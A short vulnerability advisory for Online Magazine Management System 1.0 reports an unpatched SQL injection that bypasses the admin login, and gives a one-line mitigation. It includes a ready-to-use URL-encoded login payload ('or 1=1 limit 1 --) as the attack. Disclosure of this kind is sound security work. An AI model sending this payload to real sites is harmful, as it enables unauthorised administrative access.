vendor:
Online Magazine Management System
by:
Mohamed habib Smidi (Craniums)
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Online Magazine Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:sourcecodester:online_magazine_management_system:1.0
Platforms Tested: Ubuntu
2021
Online Magazine Management System 1.0 – SQLi Authentication Bypass
Admin panel authentication can be bypassed due to SQL injection vulnerability in the login form. An attacker can bypass authentication by sending the following payload: username='+or+1%3D1+limit+1+--+-%2B&password=aaaa
Mitigation:
Input validation and sanitization should be implemented to prevent SQL injection attacks.